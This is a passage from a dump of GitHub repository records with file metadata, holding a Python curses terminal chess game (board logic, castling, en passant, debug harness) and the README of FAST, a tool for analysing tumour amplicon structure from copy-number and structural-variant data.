dic['k2']=[i, ]\n print(dic)\n\nif __name__ == '__main__':\n test()\n" } ]
68
BrynGhiffar/chess_curses
https://github.com/BrynGhiffar/chess_curses
807c131594bdb35e2b2f8ef8964df86259d48a45
a79db86ef7f95d86e164984f2e8405b37ea076f8
d8f3a7926564cb67d8bbc3592e9eaece77cb041f
refs/heads/master
2023-08-12T04:57:05.070962
2021-09-25T00:58:32
2021-09-25T00:58:32
393,341,279
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7604042887687683, "alphanum_fraction": 0.7639714479446411, "avg_line_length": 57, "blob_id": "5a43e5d60a8bf0b5c4481b281d5d18c9b462a580", "content_id": "bc0de6ddbaac5afccb9b6ff171547148ac087a86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1682, "license_type": "no_license", "max_line_length": 389, "num_lines": 29, "path": "/readme.md", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "# Chess in Curses\n\nThe ASCII art used to draw the board and the chess pieces is based on [this stack overflow post](https://codegolf.stackexchange.com/questions/54869/ascii-art-chessboard). Interestingly enough the post is about a competition to make the smallest chess program, albeit quit a simple one. I didn't participate in the competition, but I liked the ASCII art and decided to use it in my project.\n\n**How to play**\n\n* `H` moves the cyan cursor to the left\n* `L` moves the cyan cursor to the right\n* `J` moves the cyan cursor down\n* `K` moves the cyan cursor up\n* Pressing `Space` on a piece, highlights the piece/square to green and selects that piece. Prompts for the available moves the chosen piece can play.\n* Pressing `Space` on one of the yellow squares, moves the chosen piece (the one highlighted in green). To the chosen yellow square.\n\nFor the keen ones out there, you will notice these are the same keys used in VIM for navigating in normal mode.\n\n**Things to implement**\n\nBelow are some of the things that I wish to implement in the future:\n\n* Implement checking, you can't move any pieces that doesn't make your king safe.\n* Implement safe king moving, your king cannot move to a square that is attacked. This has to be embedded into the move of every piece.\n* Implement checkmating. The computer can recognise once there are no moves that can save the king.\n* Implement stalemating. The game can recognise once there are no moves that can be made by the current player\n* Implement pawn promotion. Once a pawn reaches the end it can be promoted to any piece, except for the king and another pawn.\n\n**Screenshot:**\n![](./game_play.png)\n\n![](./game_play2.png)\n" }, { "alpha_fraction": 0.5830546021461487, "alphanum_fraction": 0.6070234179496765, "avg_line_length": 22.920000076293945, "blob_id": "7c630ec3a515f5117acde4da9fd19650e02f6eb8", "content_id": "e3d72f5895cd473d2f5a4cc0653c047738114d6d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 34, "num_lines": 75, "path": "/debug.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\nfrom classes import Interface\n\ndef debug_rook(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WR\n game.brd[0][1] = game.BR\n # print(game.brd)\n game.play()\n\ndef debug_knight(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WKN\n game.brd[0][1] = game.BKN\n game.play()\n\ndef debug_bishop(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WB\n game.brd[0][1] = game.BB\n game.play()\n\ndef debug_queen(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WQ\n game.brd[0][1] = game.BQ\n game.play()\n\ndef debug_king(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[0][0] = game.WK\n game.brd[7][7] = game.BK\n game.play()\n\ndef debug_castling(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n game = Interface(stdscr)\n game.empty_board()\n game.brd[7][0] = game.WR\n game.brd[7][4] = game.WK\n game.brd[7][7] = game.WR\n for i in range(8):\n game.brd[6][i] = game.WP\n\n game.brd[0][0] = game.BR\n game.brd[0][4] = game.BK\n game.brd[0][7] = game.BR\n for i in range(8):\n game.brd[1][i] = game.BP\n game.play()\n\nif __name__ == '__main__':\n # curses.wrapper(debug_rook)\n # curses.wrapper(debug_knight)\n # curses.wrapper(debug_bishop)\n # curses.wrapper(debug_queen)\n # curses.wrapper(debug_king)\n curses.wrapper(debug_castling)\n" }, { "alpha_fraction": 0.45506468415260315, "alphanum_fraction": 0.4692137837409973, "avg_line_length": 34.94245910644531, "blob_id": "a9c7ad2c46e08851ad3a1e7872e323fd7c84c24c", "content_id": "f33aa0ac8287e6895480bf0636735a74e36a28c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23113, "license_type": "no_license", "max_line_length": 83, "num_lines": 643, "path": "/classes.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\n\n# TODO: implement enpassant DONE\n# TODO: implement castling move DONE\n# TODO: implement checking, you can't move any pieces that doesn't \n# make your king safe\n# TODO: implement safe king moving, your king cannot move to a square\n# that is attacked. This has to be embedded into the move of every\n# piece\n# TODO: implement check mating. The computer can recognize once\n# there are no moves that can save the king.\n# TODO: implement stalemating. The game can recognize once\n# there are no moves that can be made by the current player\n# TODO: implement pawn promotion\n# TODO: Make you code better!\n\nSQR = 8\n\n# From the board the pieces will deduce how\n# to make the move. For each piece is responsible\n# to coordinate themselves on how they operate\n\n# Each piece looks at the board to determine\n# What are their valid moves.\n\n# defines how the board is controlled\nclass Control:\n\n # * The Control determine the players turns\n # * The Controls controls the cursor\n # * The Control controls the the current selected piece\n # * The Control controls the board\n\n def __init__(self):\n\n # Below are the constants for the twelve pieces in the board\n self.WR, self.WKN, self.WB, self.WQ, self.WK, self.WP,\\\n self.BR, self.BKN, self.BB, self.BQ, self.BK, self.BP = list(range(12)) \n\n self.EP = -1\n self.brd = [\n [self.BR, self.BKN, self.BB, self.BQ, self.BK, self.BB, self.BKN, self.BR],\n [self.BP, self.BP, self.BP, self.BP, self.BP, self.BP, self.BP, self.BP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP, self.EP],\n [self.WP, self.WP, self.WP, self.WP, self.WP, self.WP, self.WP, self.WP],\n [self.WR, self.WKN, self.WB, self.WQ, self.WK, self.WB, self.WKN, self.WR]]\n\n self.WHITE = 0\n self.BLACK = 1\n self.turn = self.WHITE\n self.curs_loc = [0, 0] # CPs(0, 0)\n self.pce_loc = [-1, -1]\n self.moves = []\n\n # -- for enpassant --\n self.last_pawn_skip = -1 # the column of the pawn which skipped in\n # the last move, if no pawns skip\n # then value equals to -1.\n\n self.has_king_moved = [False, False]\n # self.has_king_moved[self.WHITE] = whether the white king has moved\n # self.has_king_moved[self.BLACK] = whether the black king has moved\n\n # -- for castling --\n self.has_rook_moved = [[False, False],\n [False, False]]\n # self.has_rook_moved[self.WHITE][0] = has leftmost white rook moved\n # self.has_rook_moved[self.WHITE][1] = has rightmost white rook moved\n # self.has_rook_moved[self.BLACK][0] = has leftmost black rook moved\n # self.has_rook_moved[self.BLACK][1] = has rightmost black rook moved\n\n def get_current_player(self):\n return self.turn\n\n def n_plyr(self):\n \"\"\"returns the next player of the current turn\"\"\"\n return (self.turn + 1) % 2\n\n def toggle_player_turn(self):\n self.turn = self.n_plyr()\n\n def get_ally_func(self):\n \"\"\"returns a function which test's whether a piece is an ally\n based on turn\"\"\"\n if self.turn == self.WHITE:\n return self.is_white\n else:\n return self.is_black\n\n def get_attacking_square(self, cp):\n \"\"\"returns all the squares attacked by\n the piece at position cp\"\"\"\n piece = self.brd[cp[0]][cp[1]]\n attacks = []\n if piece != self.EP:\n t = [self.WHITE, self.BLACK][self.is_black(cp)]\n if piece in [self.WP, self.BP]:\n # diagonal capture\n dc1 = (pc_pos[0] + [-1, 1][t], pc_pos[1] + [-1, 1][t])\n if self.is_within_bounds(dc1) and is_sqr_enemy(dc1):\n attacks.append(dc1)\n\n dc2 = (pc_pos[0] + [-1, 1][t], pc_pos[1] + [1, -1][t])\n if self.is_within_bounds(dc2) and is_sqr_enemy(dc2):\n attacks.append(dc2)\n elif piece in [self.WR, self.BR]:\n pass\n elif piece in [self.WKN, self.BKN]:\n pass\n elif piece in [self.WB, self.BB]:\n pass\n elif piece in [self.WQ, self.BQ]:\n pass\n elif piece in [self.WK, self.BK]:\n pass\n pass\n\n def get_all_attacking_square(self, side):\n \"\"\"returns all the squares attacked by side\"\"\"\n pass\n\n def toggle_select_piece(self):\n \"\"\"toggles the selected piece to point to a certain piece\n or point to nothing at all. points to nothing when\n self.pce_loc == [-1, -1]\"\"\"\n piece = self.brd[self.curs_loc[0]][self.curs_loc[1]]\n if (piece != self.EP) and (self.get_ally_func()(piece)):\n self.pce_loc = self.curs_loc[:]\n self.moves = self.get_valid_move()\n # print(self.last_pawn_skip)\n else:\n self.pce_loc = [-1, -1]\n self.moves = []\n\n def is_enpassant(self, cp, tp):\n \"\"\"returns true if the move being played is an enpassant\"\"\"\n is_enemy_pawn = self.brd[cp[0]][tp[1]] == [self.WP, self.BP][self.n_plyr()]\n return is_enemy_pawn and self.last_pawn_skip == tp[1]\n\n def move(self, cp, tp):\n \"\"\"moves piece from location cp to location\n tp\"\"\"\n self.brd[cp[0]][cp[1]],\\\n self.brd[tp[0]][tp[1]] =\\\n self.EP, self.brd[cp[0]][cp[1]]\n\n def make_empty(self, tp):\n \"\"\"sets board at position tp to empty\"\"\"\n self.brd[tp[0]][tp[1]] = self.EP\n\n def is_pawn(self, p):\n return self.brd[p[0]][p[1]] in [self.WP, self.BP]\n \n def is_king(self, p):\n return self.brd[p[0]][p[1]] in [self.WK, self.BK]\n\n def is_rook(self, p):\n return self.brd[p[0]][p[1]] in [self.WR, self.BR]\n\n def is_right_castling(self, cp, tp):\n t = self.turn\n r = (7, 0)[t]\n c = 4\n not_moved = not self.has_king_moved[t] and\\\n not self.has_rook_moved[t][1]\n king_correct_pos = (cp[0] == r) and (cp[1] == c)\n rook_correct_pos = self.brd[r][7] == (self.WR, self.BR)[t]\n all_correct_pos = king_correct_pos and rook_correct_pos\n empty_right = [self.is_sqr_ep((r, i)) for i in range(c + 1, 7)]\n\n is_king = self.is_king(cp)\n col_move = tp[1] - cp[1] == 2\n row_move = cp[0] - tp[0] == 0\n return is_king and col_move and row_move and all(empty_right)\\\n and not_moved and all_correct_pos\n\n def is_left_castling(self, cp, tp):\n t = self.turn\n r = (7, 0)[t]\n c = 4\n not_moved = not self.has_king_moved[t] and\\\n not self.has_rook_moved[t][0]\n king_correct_pos = (cp[0] == r) and (cp[1] == c)\n rook_correct_pos = self.brd[r][0] == (self.WR, self.BR)[t]\n all_correct_pos = king_correct_pos and rook_correct_pos\n empty_left = [self.is_sqr_ep((r, i)) for i in range(1, c)]\n\n is_king = self.is_king(cp)\n col_move = cp[1] - tp[1] == 2\n row_move = cp[0] - tp[0] == 0\n return is_king and col_move and row_move and all(empty_left)\\\n and not_moved and all_correct_pos\n\n def move_piece(self):\n \"\"\"move selected piece on pce_loc to \n curs_loc if curs_loc is a valid move\"\"\"\n tp = tuple(self.curs_loc) # target move\n cp = tuple(self.pce_loc) # current piece location\n\n\n if tp in self.moves:\n piece = self.brd[cp[0]][cp[1]]\n\n # when the move being done is an enpassant\n if self.is_pawn(cp) and self.is_enpassant(cp, tp):\n self.move(cp, tp)\n ep = (tp[0] + (1, -1)[self.turn], tp[1]) # enemy position\n self.make_empty(ep)\n self.toggle_player_turn()\n return\n\n # when the move being done is a right castle\n if self.is_right_castling(cp, tp):\n self.move(cp, tp)\n self.make_empty(((7, 0)[self.turn], 7))\n self.brd[tp[0]][tp[1] - 1] = (self.WR, self.BR)[self.turn]\n self.toggle_player_turn()\n return\n\n # when the move being done is a left castle\n if self.is_left_castling(cp, tp):\n self.move(cp, tp)\n self.make_empty(((7, 0)[self.turn], 0))\n self.brd[tp[0]][tp[1] + 1] = (self.WR, self.BR)[self.turn]\n self.toggle_player_turn()\n return\n\n # when the move being done is a pawn skip\n do_pawn_skip = lambda cp, tp : tp[0] == cp[0] + [-2, 2][self.turn]\n if self.is_pawn(cp) and do_pawn_skip(cp, tp):\n self.last_pawn_skip = tp[1]\n else:\n self.last_pawn_skip = -1\n\n # when the king moves we want to tell the game the king has moved\n if self.is_king(cp):\n self.has_king_moved[self.turn] = True\n \n if self.is_rook(cp):\n if cp == (7, 0) and self.turn == self.WHITE:\n self.has_rook_moved[self.WHITE][0] = True\n elif cp == (7, 7) and self.turn == self.WHITE:\n self.has_rook_moved[self.WHITE][1] = True\n elif cp == (0, 0) and self.turn == self.BLACK:\n self.has_rook_moved[self.BLACK][0] = True\n elif cp == (0, 7) and self.turn == self.BLACK:\n self.has_rook_moved[self.BLACK][1] = True\n\n\n self.move(cp, tp)\n self.toggle_player_turn()\n \n def empty_board(self):\n \"\"\"clears the board of all the pieces\"\"\"\n self.brd = [[self.EP for _ in range(SQR)] for _ in range(SQR)]\n\n def move_curs_right(self):\n \"\"\"moves the cursor right\"\"\"\n if self.curs_loc[1] + 1 < SQR:\n self.curs_loc[1] += 1\n\n def move_curs_left(self):\n \"\"\"moves the cursor left\"\"\"\n if self.curs_loc[1] - 1 >= 0:\n self.curs_loc[1] -= 1\n\n def move_curs_down(self):\n \"\"\"moves the cursor down\"\"\"\n if self.curs_loc[0] + 1 < SQR:\n self.curs_loc[0] += 1\n\n def move_curs_up(self):\n \"\"\"moves the cursor up\"\"\"\n if self.curs_loc[0] - 1 >= 0:\n self.curs_loc[0] -= 1\n\n def is_white(self, piece):\n return piece <= 5 and piece >= 0\n\n def is_black(self, piece):\n return piece > 5 and piece < 12\n\n def is_pawn_first_move(self, pc_pos):\n piece = self.brd[pc_pos[0]][pc_pos[1]]\n if piece == self.WP:\n return pc_pos[0] == 6\n else:\n return pc_pos[0] == 1\n\n def is_within_bounds(self, p):\n return 0 <= p[0] < SQR and 0 <= p[1] < SQR\n\n def is_sqr_ep(self, p):\n return self.brd[p[0]][p[1]] == self.EP\n\n def get_pawn_march_moves(self, cp, t):\n \"\"\"returns the marching forward move of the pawn\n based on side and position\"\"\"\n moves = []\n fm = (cp[0] + [-1, 1][t], cp[1])\n if self.is_within_bounds(fm) and self.is_sqr_ep(fm):\n moves.append(fm)\n\n sm = ([4, 3][t], cp[1])\n if self.is_pawn_first_move(cp) and self.is_sqr_ep(sm):\n moves.append(sm)\n return moves\n \n def get_pawn_diagonal_capture_moves(self, cp, t, is_sqr_enemy):\n # diagonal capture\n moves = []\n dc1 = (cp[0] + [-1, 1][t], cp[1] + [-1, 1][t])\n if self.is_within_bounds(dc1) and is_sqr_enemy(dc1):\n moves.append(dc1)\n\n dc2 = (cp[0] + [-1, 1][t], cp[1] + [1, -1][t])\n if self.is_within_bounds(dc2) and is_sqr_enemy(dc2):\n moves.append(dc2)\n return moves\n\n def get_pawn_enpassant_capture_moves(self, cp, t):\n moves = []\n ec1 = (cp[0] + [-1, 1][t], cp[1] + [-1, 1][t])\n if self.is_within_bounds(ec1) and self.is_enpassant(cp, ec1):\n moves.append(ec1)\n\n ec2 = (cp[0] + [-1, 1][t], cp[1] + [1, -1][t])\n if self.is_within_bounds(ec2) and self.is_enpassant(cp, ec2):\n moves.append(ec2)\n return moves\n \n def get_rook_moves(self, cp, is_sqr_ally, is_sqr_enemy):\n moves = []\n for d in [(0, -1), (0, 1), (1, 0), (-1, 0)]:\n r, c = cp\n tp = (r + d[0], c + d[1]) # target position\n while self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n if is_sqr_enemy(tp):\n break\n tp = (tp[0] + d[0], tp[1] + d[1])\n return moves\n\n def get_knight_moves(self, cp, is_sqr_ally):\n moves = []\n for s in [(-1, 1), (1, -1), (1, 1), (-1, -1)]:\n for d in [(2, 1), (1, 2)]:\n tp = (cp[0] + d[0] * s[0], cp[1] + d[1] * s[1])\n if self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n return moves\n\n def get_bishop_moves(self, cp, is_sqr_ally, is_sqr_enemy):\n moves = []\n for d in [(1, 1), (1, -1), (-1, 1), (-1, -1)]:\n r, c = cp\n tp = (r + d[0], c + d[1]) # target position\n while self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n if is_sqr_enemy(tp):\n break\n tp = (tp[0] + d[0], tp[1] + d[1])\n return moves\n \n def get_king_moves(self, cp, is_sqr_ally):\n moves = []\n r, c = cp\n for d in [(1, 1), (1, -1), (-1, 1), (-1, -1),\n (0, -1), (0, 1), (1, 0), (-1, 0)]:\n tp = (r + d[0], c + d[1])\n if self.is_within_bounds(tp) and not is_sqr_ally(tp):\n moves.append(tp)\n return moves\n\n def get_king_castling_move(self, cp, t):\n moves = []\n r, c = (7, 0)[t], 4\n tp = (r, c - 2)\n if self.is_left_castling(cp, tp):\n moves.append((r, c - 2))\n tp = (r, c + 2)\n if self.is_right_castling(cp, tp):\n moves.append((r, c + 2))\n return moves\n\n def get_valid_move_aux(self, pc_pos, is_ally, is_enemy):\n \"\"\"generates valid moves for selected piece\"\"\"\n moves = []\n selected_piece = self.brd[pc_pos[0]][pc_pos[1]]\n t = self.turn\n\n # does this square contain an enemy piece\n is_sqr_enemy = lambda p : is_enemy(self.brd[p[0]][p[1]])\n\n # does this square contain an ally piece\n is_sqr_ally = lambda p : is_ally(self.brd[p[0]][p[1]])\n\n if selected_piece in [self.WP, self.BP]:\n\n moves.extend(self.get_pawn_march_moves(pc_pos, t))\n\n moves.extend(\n self.get_pawn_diagonal_capture_moves(pc_pos, t, is_sqr_enemy))\n\n moves.extend(self.get_pawn_enpassant_capture_moves(pc_pos, t))\n\n elif selected_piece in [self.WR, self.BR]:\n moves.extend(\n self.get_rook_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WKN, self.BKN]:\n moves.extend(self.get_knight_moves(pc_pos, is_sqr_ally))\n\n elif selected_piece in [self.WB, self.BB]:\n moves.extend(\n self.get_bishop_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WQ, self.BQ]:\n moves.extend(\n self.get_rook_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n moves.extend(\n self.get_bishop_moves(pc_pos, is_sqr_ally, is_sqr_enemy))\n\n elif selected_piece in [self.WK, self.BK]:\n moves.extend(self.get_king_moves(pc_pos, is_sqr_ally))\n moves.extend(self.get_king_castling_move(pc_pos, t))\n return moves\n\n def get_valid_move(self):\n # returns array of legal positions\n pc_pos = self.pce_loc\n selected_piece = self.brd[pc_pos[0]][pc_pos[1]]\n moves = []\n if self.is_white(selected_piece):\n\n # find legal next moves for that particular black piece\n moves.extend(\n self.get_valid_move_aux(pc_pos, self.is_white, self.is_black))\n elif self.is_black(selected_piece):\n\n # find legal next moves for that particular white piece\n moves.extend(\n self.get_valid_move_aux(pc_pos, self.is_black, self.is_white))\n return moves\n\nclass Display(Control):\n\n def __init__(self, stdscr):\n super().__init__()\n\n self.stdscr = stdscr\n self.BOARD_POS = (0, 0) # dimension of board is 40 rows x 72 columns\n self.CHR_PR_COL = 9\n self.CHR_PR_ROW = 5\n # determines the color of the board\n self.CLR_BRD = [[(i + j) % 2 for j in range(SQR)]\\\n for i in range(SQR)]\n\n self.ABK = [ ' _+_ ', # Each piece has dimensions w x h : 5 x 5\n ' )@( ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABQ = [ ' www ',\n ' )@( ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ' ]\n self.ABB= [ ' ',\n ' (/) ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABKN = [ ' ',\n ' _,, ',\n ' \"- \\~ ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABR = [ ' ',\n ' |_|_| ',\n ' |@| ',\n ' |@| ',\n ' /@@@\\\\ ']\n self.ABP = [ ' ',\n ' ',\n ' () ',\n ' )( ',\n ' /@@\\\\ ']\n\n self.AWK = [ ' _+_ ', # Each piece has dimensions w x h : 5 x 5\n ' ) ( ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWQ = [ ' www ',\n ' ) ( ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ' ]\n self.AWB = [ ' ',\n ' (/) ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWKN = [ ' ',\n ' _,, ',\n ' \"- \\~ ',\n ' | | ',\n ' /___\\\\ ']\n self.AWR = [ ' ',\n ' |_|_| ',\n ' | | ',\n ' | | ',\n ' /___\\\\ ']\n self.AWP = [ ' ',\n ' ',\n ' () ',\n ' )( ',\n ' /__\\\\ ']\n self.PIECES = [self.AWR, self.AWKN, self.AWB, self.AWQ, self.AWK, self.AWP,\n self.ABR, self.ABKN, self.ABB, self.ABQ, self.ABK, self.ABP]\n self.MASK_PIECES = [self.mask(piece) for piece in self.PIECES]\n self.ALL_PIECES = [self.PIECES, self.MASK_PIECES]\n\n # colors\n\n def mask(self, ascii_piece):\n # create a copy of the piece\n piece = [[ascii_piece[i][j] for j in range(self.CHR_PR_COL)]\\\n for i in range(self.CHR_PR_ROW)]\n\n # modify the copy to fill the background\n for line in piece:\n # 0 to right\n i = 0\n while (i < self.CHR_PR_COL) and (line[i] == ' '):\n line[i] = ':'\n i += 1\n # self.\n i = self.CHR_PR_COL - 1\n while (i >= 0) and (line[i] == ' '):\n line[i] = ':'\n i -= 1\n\n # return the masked copy\n return [''.join(line) for line in piece]\n\n def draw_board(self):\n col = self.CHR_PR_COL\n row = self.CHR_PR_ROW\n square = SQR\n empty = self.EP\n pb = self.brd\n cb = self.CLR_BRD\n ap = self.ALL_PIECES\n # texture = [' ', '█']\n texture = [' ', ':']\n curses.init_pair(1, -1, curses.COLOR_CYAN) # selected_cursor\n curses.init_pair(2, -1, curses.COLOR_GREEN) # selected_piece\n curses.init_pair(3, -1, curses.COLOR_YELLOW) # moves\n\n for _ in range(col * square + 2):\n self.stdscr.addstr(':')\n self.stdscr.addstr('\\n')\n\n for i in range(row * square):\n self.stdscr.addstr(':')\n for j in range(col * square):\n is_slt_piece = [ i // row, j // col ] == self.pce_loc\n is_slt_curs = [i // row, j // col] == self.curs_loc\n is_move_sqr = (i // row, j // col) in self.moves\n\n if is_slt_piece:\n self.stdscr.attron(curses.color_pair(2))\n if is_move_sqr:\n self.stdscr.attron(curses.color_pair(3))\n if is_slt_curs:\n self.stdscr.attron(curses.color_pair(1))\n\n if pb[i // row][j // col] == empty:\n self.stdscr.addstr(texture[cb[i // row][j // col]])\n else:\n self.stdscr.addstr(ap[cb[i // row][j // col]]\\\n [pb[i // row][j // col]][i % row][j % col])\n\n self.stdscr.attroff(curses.color_pair(1))\n self.stdscr.attroff(curses.color_pair(2))\n self.stdscr.attroff(curses.color_pair(3))\n # print(\":\")\n self.stdscr.addstr(':\\n')\n\n for _ in range(col * square + 2):\n self.stdscr.addstr(':')\n self.stdscr.addstr('\\n')\n\n\nclass Interface(Display):\n\n def __init__(self, stdscr):\n super().__init__(stdscr)\n self.key_right = ord('l')\n self.key_left = ord('h')\n self.key_up = ord('k')\n self.key_down = ord('j')\n self.key_toggle_select = ord(' ')\n\n def on_key_press(self, key):\n if key == self.key_right:\n self.move_curs_right()\n elif key == self.key_left:\n self.move_curs_left()\n elif key == self.key_down:\n self.move_curs_down()\n elif key == self.key_up:\n self.move_curs_up()\n elif key == self.key_toggle_select:\n self.move_piece()\n self.toggle_select_piece()\n pass\n\n def play(self):\n quit = False\n while not quit:\n self.stdscr.clear()\n self.draw_board()\n key = self.stdscr.getch()\n self.on_key_press(key)\n if key == ord('q'):\n quit = True\n\ndef main():\n c = Control()\n c.turn = c.BLACK\n c.curs_loc = (1, 1)\n print(c.get_valid_move())\n pass\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6257309913635254, "alphanum_fraction": 0.6315789222717285, "avg_line_length": 20.3125, "blob_id": "6a004060356d615e9ea2a158912d1d28e457088d", "content_id": "18eaf3b6babc737bb0f262529737df67fc351c0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 342, "license_type": "no_license", "max_line_length": 38, "num_lines": 16, "path": "/main.py", "repo_name": "BrynGhiffar/chess_curses", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nimport curses\nfrom classes import Display, Interface\n\ndef main(stdscr):\n curses.use_default_colors()\n curses.curs_set(0)\n maxy, maxx = stdscr.getmaxyx()\n # Display(stdscr).draw_board()\n # stdscr.getch()\n Interface(stdscr).play()\n pass\n\nif __name__ == '__main__':\n # main()\n curses.wrapper(main)\n\n" } ]
4
zick-lab/FAST
https://github.com/zick-lab/FAST
4a20b5eee77b0d8eae2c042950eb481393e48680
0819f9c2def861b094daf62e2b5aff0b5117e3fb
629570b91fe19abee427464ab4db542273d3485f
refs/heads/master
2022-03-20T10:00:04.051793
2022-03-06T13:38:26
2022-03-06T13:38:26
152,279,683
0
1
null
2018-10-09T15:55:22
2018-12-03T15:02:26
2019-01-03T07:20:42
Python
[ { "alpha_fraction": 0.7391533255577087, "alphanum_fraction": 0.7570339441299438, "avg_line_length": 38.20618438720703, "blob_id": "4b904d4fe3ebbd55fed5d055f00de388f6222fef", "content_id": "a158c1f9c743508d84cc5c8809d2e19497a6019a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3805, "license_type": "no_license", "max_line_length": 241, "num_lines": 97, "path": "/README.md", "repo_name": "zick-lab/FAST", "src_encoding": "UTF-8", "text": "# FAST - FindAmpliconSTructure\n\nFAST is a tool for analyzing the structure and characteristics of amplicons, based on Copy Number Variations and Structural Variations data.\n\n## Citing FAST\nIf you are using FAST in your research, please cite our paper as follows:\n\nClinical Implications of Sub-grouping HER2 Positive Tumors by Amplicon Structure and Co-amplified Genes. Maoz, M., Devir, M., Inbar, M. et al. Scientific Reports, 9, 18795 (2019). https://rdcu.be/b3X1q\n\n\n## Prerequisites\nPython 2.7.x\n<br>\nPackages:\n<br>\n- numpy >= 1.8.2\n- pandas == 0.17.0<br>\n- xlsxwriter >= 0.6.6<br>\n- xlwt >= 0.7.5<br>\n- xlrd<br>\n\n## Usage\n`python Fast.py [-h] --config CONFIG [--excel] [--remove_cent]`\n<br>\nParameters:\n- --help, -h\t\t\t\tshow this help message and exit\n-\t--config CONFIG, -c CONFIG\tConfiguration file\n-\t--excel, -e \t\t\tgenerated colored excel file\n-\t--remove_unmappble, -r \tremove unmappable areas, specifically centromeres and telomeres data\n<br>\nsee example below in \"Running FAST on test data\" section\n\n## Inputs\n### Input files\nFAST requires the following input data:\n1. Structural Variations (SVs) in the genome of the analyzed sample, as generated by BreakDancerMax.\n2. Copy Number Variations (CNVs) in the genome of the analyzed sample, as generated by Control-FREEC.\n\nThe current version of FAST relies on the file formats of these tools. Thus, it is recommended to use these tools for generating inputs to FAST. However, other tools can be used as well as long as the file format is kept.\n\n### Configuration File\nThe configuration file consists of two groups; the first is [PARAMS], in which certain parameters and constants are set. The user may use the default values, or update them. The second group is [FILES], in which the input files are supplied.\n\n#### Configuration File [PARAMS] parameters:\n-\tWINDOW = 15000\nWindow size used for digitization.\n-\tWINDOW_MULT = 3\nThe tool calculates threshold as WINDOW_MULT * WINDOW, and uses it for classifying the breakpoints to the corresponding segments.\n-\tCNV_MINIMAL_CN = 6\nMinimal copy number value for considering an area as amplified.\n-\tSV_MINIMAL_SCORE = 90\nBreakpoints with a lower score will be removed from the analysis.\n-\tSV_MINIMAL_NUM_READS = 2\nBreakpoints with a lower number of supporting reads will be removed from the analysis.\n-\tSV_MINIMAL_DELETIONS_REMOVE = 1000\nDeletions which are shorter than this value will be removed from the analysis.\n\n#### Configuration File [FILES] parameters:\n-\tUNMAPPBLE_INP\nA comma delimited file which contains centromeres and telomeres info. Assumed to contain the following fields:\nchr\nchromStart\nchromEnd\ntype (centromere / telomere)\n-\tSAMPLE_ID\n-\tFAST_OUTPUT_DIR\n-\tCNV_INP\nCopy Number Variations (CNVs) file, generated by Control-FREEC\n-\tSV_INP\nStructural Variations (SVs) file, generated by BreakDancerMax.\n\n## Output\nFAST output is stored in the configured output directory (FAST_OUTPUT_DIR). \n\nThe tool outputs the following files:\n-\t<SAMPLE_ID>_cnv_FAST.csv\n<br>CNV file after Fast processing\n-\t<SAMPLE_ID>_sv_FAST.csv\n<br>SV file after Fast processing \n-\t<SAMPLE_ID>_amplicons_FAST.csv\n<br>Amplicon Analysis\n-\t<SAMPLE_ID>_segments_FAST.csv\n<br>Segment Analysis\n-\t<SAMPLE_ID>_focused_genes_FAST.csv\n<br>Analysis of the focused genes loci\n-\t<SAMPLE_ID>_FAST.xlsx\n<br>File summarizing the data of all above files. In this file colors are assigned to cells, such that each amplicon has its own color. This makes it easier for the human eye to see the relations between the different records.\n\n## Running FAST on test data\nTest data of HCC1954 is supplied under `example/data/HCC1954`\n<br>\nmake sure to create `FAST_OUTPUT_DIR` as configured in `example/data/HCC1954/HCC1954_config.txt`\n<br>\nRun by: `python Fast.py -c example/data/HCC1954/HCC1954_config.txt -e –r`\n\n## Author\nMichal Devir\n" }, { "alpha_fraction": 0.5126163363456726, "alphanum_fraction": 0.5230458378791809, "avg_line_length": 33.81124496459961, "blob_id": "51b3f1d178bab1e693f1a791bfad6bc6b5da4dfb", "content_id": 